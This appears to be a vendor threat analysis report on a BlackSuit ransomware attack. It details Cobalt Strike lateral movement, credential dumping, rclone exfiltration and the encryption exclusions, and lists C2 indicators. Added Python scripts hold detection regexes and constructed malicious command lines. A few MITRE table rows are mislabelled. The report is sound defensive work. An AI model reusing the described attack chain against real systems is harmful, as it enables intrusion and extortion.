Cybereason Security Services issue Threat Analysis reports to inform on impacting threats. The Threat Analysis reports investigate these threats and provide practical recommendations for protecting against them.
In this Threat Analysis report, Cybereason Security Services investigates a BlackSuit ransomware attack we recently observed that represents a significant threat to organizations, leveraging tools like Cobalt Strike for command and control (C2), rclone for data exfiltration, and BlackSuit ransomware for file encryption.
Our team recently observed a ransomware attack performed by the BlackSuit ransomware group that highlighted new methods employed by the threat actor and the impact on the affected organization.
BlackSuit ransomware is a recent evolution of the Royal ransomware family. It leverages various sophisticated tools for lateral movement, data exfiltration, and encryption.
Returning to public attention in 2024, the BlackSuit ransomware group is an emerging successor to the notorious Royal ransomware. The group has shown sophisticated attack methods that utilize tools including remote command execution (psexec.exe), a red-team penetration testing framework (Cobalt Strike), remote access and management (RDP), a command-line tool for syncing and transferring files (rclone), and more. Ransom demands have ranged from roughly $1 million to $10 million USD, usually requested in Bitcoin. Unlike many ransomware groups, BlackSuit does not state the ransom amount in the initial ransom note; payment and negotiation require direct interaction with the threat actor through a Tor browser.
During their attack, the BlackSuit ransomware group leveraged Cobalt Strike beacons to move laterally and establish C2 connections, and used the BlackSuit ransomware payload to encrypt data.
The initial access vector for this attack remains unknown, as our observations indicate that the first connections to the affected machines originated from a device without a Cybereason sensor.
In this investigation, Cobalt Strike was observed to be the primary attack tool used by BlackSuit ransomware. We have grouped the observed behaviors related to Cobalt Strike into the categories below.
BlackSuit ransomware is widely reported to utilize RDP, SMB, and PsExec.exe for moving laterally within the environment. We have detected and investigated instances particularly utilizing PsExec.exe and remote procedure call (RPC), which can be seen in the screenshot below.
Utilizing PsExec.exe
Cybereason observed PsExec.exe being used to execute remote commands that attempted to copy the Cobalt Strike Beacons vm.dll and vm80.dll into the C:\Windows\Temp folder of other machines in the environment. The commands then attempted to execute the beacons by calling their exported function ExportFunc64.
Utilizing Remote Procedure Call (RPC) and Other Windows Functions
Cybereason observed execution of Configure-SMRemoting.exe on one of the affected devices, which enables remote management of the host. Remote services were created over RPC (MS-SCMR RCreateService) with SYSTEM privileges. In addition, multiple binaries with atypical naming conventions were executed from a network share; some of these resulted in rundll32 injecting code into wuauclt.exe and scanning the entire internal network.
Five other executables with similar atypical naming conventions were observed being executed in the same way.
Lateral Movement activity detected in Cybereason EDR
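The lateral-movement chain described above (PsExec dropping beacon DLLs into C:\Windows\Temp, rundll32 calling an export from that folder, and oddly named executables launched straight from ADMIN$) can be turned into a handful of process-creation rules. The following is an added example written for this article, not Cybereason's detection logic; the event records are constructed to resemble Windows process-creation telemetry (Sysmon Event ID 1 or an EDR process event), and the field names and rule thresholds are assumptions.

```python
"""Flag process-creation events matching the PsExec/rundll32 beacon deployment
pattern described in the report. Added example, not Cybereason's code; sample
events and field names are constructed/assumed."""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    image: str          # full path of the created process
    parent_image: str   # full path of the parent process
    command_line: str


# Constructed sample telemetry for this example (not from the incident).
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\cmd.exe",
              r"C:\Windows\PSEXESVC.exe",
              r"cmd.exe /c copy \\10.1.2.3\share\vm.dll C:\Windows\Temp\vm.dll"),
    ProcEvent(r"C:\Windows\System32\rundll32.exe",
              r"C:\Windows\PSEXESVC.exe",
              r"rundll32.exe C:\Windows\Temp\vm80.dll,ExportFunc64"),
    ProcEvent(r"\\10.1.5.6\ADMIN$\a2e6ee5.exe",
              r"C:\Windows\System32\services.exe",
              r"\\10.1.5.6\ADMIN$\a2e6ee5.exe"),
    ProcEvent(r"C:\Windows\System32\rundll32.exe",     # benign-looking control case
              r"C:\Windows\explorer.exe",
              r"rundll32.exe shell32.dll,Control_RunDLL"),
]

# rundll32 loading a DLL from the Temp staging folder and calling a named export
TEMP_DLL_EXPORT = re.compile(
    r'rundll32(?:\.exe)?\s+"?(?P<dll>[a-z]:\\windows\\temp\\[^\s",]+\.dll)"?,(?P<export>\w+)',
    re.IGNORECASE)
# process image located directly on an administrative share (\\host\ADMIN$\... or \\host\C$\...)
ADMIN_SHARE = re.compile(r"^\\\\[^\\]+\\(admin|c)\$\\", re.IGNORECASE)
# short all-hex file names like a2e6ee5.exe ("atypical naming convention" in the report)
RANDOM_HEX_NAME = re.compile(r"^[0-9a-f]{6,8}\.exe$", re.IGNORECASE)


def classify(ev: ProcEvent) -> list[str]:
    """Return the names of every rule the event matches (empty list = clean)."""
    hits = []
    parent = ev.parent_image.rsplit("\\", 1)[-1].lower()
    if parent == "psexesvc.exe":            # child of the PsExec service = remote execution
        hits.append("psexec_child")
    if TEMP_DLL_EXPORT.search(ev.command_line):
        hits.append("rundll32_temp_dll_export")
    if ADMIN_SHARE.match(ev.image):
        hits.append("exec_from_admin_share")
    if RANDOM_HEX_NAME.match(ev.image.rsplit("\\", 1)[-1]):
        hits.append("random_hex_name")
    return hits


def scan(events) -> dict[str, list[str]]:
    """Map the command line of each suspicious event to the rules it tripped."""
    return {ev.command_line: hits for ev in events if (hits := classify(ev))}


if __name__ == "__main__":
    for cmd, rules in scan(SAMPLE_EVENTS).items():
        print(f"{', '.join(rules):45} {cmd}")
```

In a real deployment the rules would be fed from the EDR's process stream rather than a static list; the `psexec_child` rule in particular needs an allowlist for administrators who legitimately use PsExec, while the Temp-folder export call and execution from ADMIN$ are rarely legitimate and deserve a high-severity alert on their own.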
Cobalt Strike Beacon Downloading
Cybereason observed PowerShell commands connecting to the C2 IP address 184.174.96[.]71 to download file.ext and save it as vm.dll and vm80.dll. Both files were identified as Cobalt Strike Beacons through file hash reputation.
Executed PowerShell commands are as follows:
Malicious Payload Download
Originating from PsExec.exe, PowerShell commands were executed to connect to a compromised internal IP address, download a malicious payload, and save it as b.exe; the file was renamed again later on. We identified this payload as the BlackSuit ransomware. Multiple malicious activities, including network scanning and file deletion, were also observed. Its malicious behavior is discussed further in the Impact section.
Typical ransomware creates a mutex (via CreateMutex) to avoid re-infection or duplicate execution; the -nomutex flag observed here disables mutex creation. This suggests a possible shift in tactics, enabling multiple concurrent executions, potentially for redundancy, faster encryption across sessions, or to bypass mutex-based detections and sandbox limitations.
In addition, another file was observed in the environment and used for ransomware-related behavior. It was also identified as the BlackSuit ransomware payload, since it shares the same file hash as b.exe.
Second Malicious Payload vmware.dll Downloaded
Originating from suspicious executables in the network share folder (\\10.1.xxx.xxx\ADMIN$\xxx.exe), rundll32.exe was spawned and connected to the C2 IP address 184[.]174[.]96[.]71. PowerShell commands were then executed that connected to the C2 IP address 180[.]131[.]145[.]85:8098 to download a malicious payload (file.ext), which was renamed to vmware.dll. It was then loaded and executed by rundll32.exe through the command line shown below.
LSASS Credential Access and Dumping
Cobalt Strike itself is known to leverage tools like Mimikatz or CredBandit for various credential dumping behaviors.
Rundll32.exe was observed connecting to multiple malicious domains/IPs following the naming convention xxx.misstallion[.]com while loading the Cobalt Strike beacons vm.dll and vm80.dll. It then performed anonymous RWX code injection into wuauclt.exe, which led to LSASS being accessed and credential dump files being created.
Data Exfiltration
In this incident, rclone.exe was renamed to vmware.exe before use. Rclone is a free, open-source command-line tool for copying, syncing, encrypting, and managing files between cloud storage and a local system.
Executed from a network shared folder, a2e6ee5.exe spawned rundll32.exe and cmd.exe, and ran vmware.exe (rclone.exe), which connected to multiple C2 domains and IP addresses. This is believed to be the data exfiltration phase of the attack. Roughly 60 GB of data was observed in transit.
Data Exfiltration activity detected in Cybereason EDR
Data Deletion Through vssadmin.exe
PowerShell was observed downloading the malicious payload yyy.exe and renaming it to b.exe. When executed, b.exe conducted network scanning and then invoked vssadmin.exe to delete volume shadow copies. The exact PowerShell command used is shown below:
File Enumeration and Encryption Logic
After the backups were deleted, BlackSuit ransomware set its exclusion paths (the files or directories spared from file encryption). The following file extensions are excluded from being encrypted:
.BlackSuit
.exe
.dll
README.BlackSuit.txt
Code Snippet Of file enumeration and encryption logic
It then avoids encrypting critical system directories and network shares, likely to reduce the risk of breaking system functionality.
"Windows" (prevents encrypting system files).
"IPC$" (avoids breaking IPC mechanisms).
"ADMIN$" (prevents issues with admin shares).
Code Snippet Of Checking Other Exclusions
Encryption of Data and Leaving Ransom Notes
BlackSuit ransomware is known for its dual approach of data encryption and data deletion, compared to traditional ransomware that focuses only on data deletion. BlackSuit also supports partial encryption, which lets the threat actor choose what percentage of data to encrypt; this helps evade detection and significantly improves encryption speed.
From the BlackSuit ransomware payload, we were able to detect file events that indicate encryption behavior and ransom notes creation.
This function copies the wide string "README.BlackSuit.txt" (20 characters) into a dynamically allocated or preallocated internal buffer.
It is preparing this string, most likely in order to write (drop) the ransom note.
This function writes or stores the ransom message body (in cleartext) and registers a cleanup or exit routine. It is likely called after the ransom note filename has been set (README.BlackSuit.txt, from the earlier function) and is part of the setup routine for dropping the ransom note on disk.
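The exclusion rules above (the .BlackSuit, .exe and .dll extensions, the note file itself, and the Windows, IPC$ and ADMIN$ locations) together with the README.BlackSuit.txt drop give a responder enough to take a quick census of a recovered file tree: how many files were encrypted, where notes were dropped, and which in-scope files survived. The following is an added example written for this article, not Cybereason's code and not the ransomware's logic; the sample tree is constructed in a temporary directory, and treating any directory component named "Windows" as excluded is a simplification.

```python
"""Post-incident triage of a file tree hit by BlackSuit. Added example, not
Cybereason's code. Counts .BlackSuit files, locates README.BlackSuit.txt notes,
and separates files the payload's exclusion list would have spared from files
that were in scope but are still intact. The sample tree is constructed."""
import os
import tempfile
from pathlib import Path

ENCRYPTED_EXT = ".blacksuit"
NOTE_NAME = "README.BlackSuit.txt"
EXCLUDED_EXT = {".blacksuit", ".exe", ".dll"}       # extensions the report lists as skipped
EXCLUDED_DIRS = {"windows", "ipc$", "admin$"}       # locations the report lists as skipped


def in_excluded_dir(rel: Path) -> bool:
    """True if any directory on the relative path is one the payload skips.
    Simplification (assumption): the real check may apply only to top-level names."""
    return any(part.lower() in EXCLUDED_DIRS for part in rel.parts[:-1])


def triage(root: Path) -> dict:
    """Walk the tree once and bucket every file by what happened to it."""
    result = {"encrypted": 0, "notes": [], "spared_by_rule": 0, "intact_in_scope": []}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            p = Path(dirpath) / name
            rel = p.relative_to(root)
            if name == NOTE_NAME:
                result["notes"].append(str(rel.parent))
            elif p.suffix.lower() == ENCRYPTED_EXT:
                result["encrypted"] += 1
            elif p.suffix.lower() in EXCLUDED_EXT or in_excluded_dir(rel):
                result["spared_by_rule"] += 1
            else:
                # in scope for encryption yet untouched: the run was interrupted,
                # partial, or this file was created afterwards; worth a closer look
                result["intact_in_scope"].append(str(rel))
    return result


def demo() -> dict:
    """Constructed tree: two encrypted documents, one note, one .exe, one file under
    Windows, and one plaintext file the payload should have reached but did not."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        docs = root / "Users" / "alice" / "Documents"
        docs.mkdir(parents=True)
        (root / "Windows" / "System32").mkdir(parents=True)
        (docs / "budget.xlsx.BlackSuit").write_bytes(b"\x00constructed ciphertext\x00")
        (docs / "memo.docx.BlackSuit").write_bytes(b"\x00constructed ciphertext\x00")
        (docs / NOTE_NAME).write_text("constructed placeholder note\n")
        (docs / "tool.exe").write_bytes(b"MZconstructed")
        (root / "Windows" / "System32" / "drivers.etc").write_text("constructed\n")
        (root / "Users" / "alice" / "todo.txt").write_text("still plaintext\n")
        return triage(root)


if __name__ == "__main__":
    print(demo())
```

The "intact in scope" bucket is the interesting one for a responder: with partial encryption and the -nomutex behavior noted earlier, several concurrent runs can leave an uneven footprint, and listing untouched in-scope files helps decide which shares were actually reached before containment.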
This BlackSuit ransomware attack demonstrated a sophisticated and multi-stage operation aimed at compromising the target's systems, exfiltrating sensitive data, and encrypting critical files.
As part of the data exfiltration phase, the attacker leveraged a renamed version of the legitimate rclone utility to covertly transfer sensitive files to a remote location, thereby compromising confidentiality. This step highlighted the attacker’s ability to blend malicious activity with legitimate processes, making detection more challenging.
This attack underscores the importance of robust security measures, including network segmentation and vigilance against the abuse of legitimate tools for malicious purposes. A comprehensive security strategy is essential to prevent and mitigate the impact of such advanced threats.
IOC | IOC Type | Description |
d53f5c10f07d4610a0fa1b6a8638648e4ab5370377364a2cc7aff4bb75c4d71b | SHA-256 | Vm80.dll |
69a20bae02480e03cb36e26729ed4a74c613eee5ba8c44396655da84a851fd03 | SHA-256 | Vm.dll |
0112e3b20872760dda5f658f6b546c85f126e803e27f0577b294f335ffa5a298 | SHA-256 | rclone.exe disguised as vmware.exe. Used for data exfiltration in the incident. |
180[.]131[.]145[.]85 | IP address | C2 IP address |
82.192.88[.]95 | IP address | C2 IP address |
88[.]119[.]175[.]194 | IP address | C2 IP address |
184.174.96[.]71 | IP address | C2 IP address |
misstallion[.]com | Domain | C2 Domain |
Store.misstallion[.]com | Domain | C2 Domain |
mail.misstallion[.]com | Domain | C2 Domain |
store[.]beamofthemoon[.]com | Domain | C2 Domain |
Mail[.]beamofthemoon[.]com | Domain | C2 Domain |
beamofthemoon[.]com | Domain | C2 Domain |
mail[.]beamofthemoon[.]com | Domain | C2 Domain |
mail[.]kiddlanka[.]com | Domain | C2 Domain |
kiddlanka[.]com | Domain | C2 Domain |
Tactic | Techniques / Sub-Techniques | Summary |
TA0002 - Execution | T1059 - Command and Scripting Interpreter: PowerShell | PowerShell downloading Cobalt Strike beacon and other malicious payloads |
TA0008 - Lateral Movement | T1021.002 - Remote Services: SMB/Windows Admin Shares | Lateral movement from psexec.exe |
TA0008 - Lateral Movement | T1569.002 - System Services: Service Execution | Lateral movement from psexec.exe |
TA0008 - Lateral Movement | T1021 - Remote Services | Lateral movement from RPC |
T1021 - Remote Desktop Protocol (RDP) | T1136.001 - Create Account: Local Account | Adds an existing user (Administrator) to the Remote Desktop Users group, enabling RDP access. |
T1082 - System Information Discovery | T1082 - System Information Discovery | Gathering details about installed software, specifically security products. |
T1562 - Impair Defenses | T1562.001 - Disable or Modify Tools | Uninstall a product (probably security software). |
TA0011 - Command and Control | T1105 - Ingress Tool Transfer | PowerShell downloading Cobalt Strike beacon (vmware.dll, vm.dll, vm80.dll, xxx.exe, yyy.exe) and other payloads. |
TA0006 - Credential Access | T1003.001 - LSASS Memory | Cobalt Strike beacon led to LSASS credential access and dumping |
TA0010 - Exfiltration | T1567.002 - Exfiltration Over Web Service: Exfiltration to Cloud Storage | Data exfiltration through rclone.exe |
TA0005 - Defense Evasion | T1614 - System Location Discovery | Avoids encrypting system directories and network shares like "Windows", "IPC$", and "ADMIN$". |
TA0040 - Impact | T1490 - Inhibit System Recovery | Deletes Volume Shadow Copies (vssadmin.exe) to prevent recovery. |
TA0040 - Impact | T1486 - Data Encrypted for Impact | Data encryption by BlackSuit ransomware payload |
Mahadev Joshi
Senior Security Analyst, Cybereason Global SOC
Kengwei Lin
Senior Security Analyst, Cybereason Global SOC